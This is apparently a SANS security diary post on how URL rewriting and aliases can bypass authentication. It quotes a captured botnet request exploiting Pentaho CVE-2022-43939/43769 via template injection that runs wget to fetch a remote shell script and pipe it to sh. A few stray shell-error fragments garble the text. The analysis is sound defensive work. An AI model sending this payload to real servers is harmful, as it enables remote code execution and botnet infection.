We continue to encounter high-profile vulnerabilities that relate to how URL mapping (or "aliases") interac\|zsh:1: parse error near `&' ts with URL-based access control. Last week, we wrote about the Oracle Identity Manager vulnerability. I noticed some scans for an older vulnerability with similar roots today:

/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23%7BT(java.lang.Runtime).getRuntime().exec('wget%20-qO-%20http%3A%2F%2F[redacted]%2Frondo.pms.sh%7Csh')%7D&mgrDn=a&pwd=a

This request attempts to exploit a vulnerability in Hitachi Vantara Pentaho Business Analytics Server \| (CVE-2022-43939 and CVE-2022-43769). In this case, the end of the URL (/require.js) bypasses authentication. However, the request is still processed by "ldapTreeNodeChildren", which is vulnerable to a template injection, causing the code to be executed. As last week, it appears that the "Chicago Rapper" Rondo botnet is again exploiting this vulnerability.

However, let's examine the underlying cause of this issue.

For many applications, it makes sense to exempt certain URLs from authentication. For example, help pages, \| a password reset page, or a customer support contact page may need to be accessible even if the user is not logged in.

Webservers offer a wide range of options to map URLs to files on the web server's file system. For example, for our API, we use this directive in Apache's configuration:

RewriteEngine On
RewriteBase /api
RewriteRule ^.*$ index.html

In NGINX, the "Location" directive is often used to map different URLs to specific files. A very common configuration option in NGINX:

location / {
    try_files $uri $uri/ /index.html;
}

If the actual file is not available, "index.html" will be returned instead of an error page.

None of the examples above is necessarily insecure. However, they must be considered in the context of any access control rules that may be enforced by the application. In particular, Java developers seem to struggle with this issue, possibly due to the complexity of some applications or the use of more application-specific paths in Java applications. 

A common problem is also the misuse of regular expressions. For example, mistaking the literal "." for the regex "arbitrary character" wildcard, or missing anchors (^, $) to terminate strings. When reviewing a web server configuration, carefully review any URL remapping instructions and verify that they do not conflict with any assumptions regarding authentication and access control.

--
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu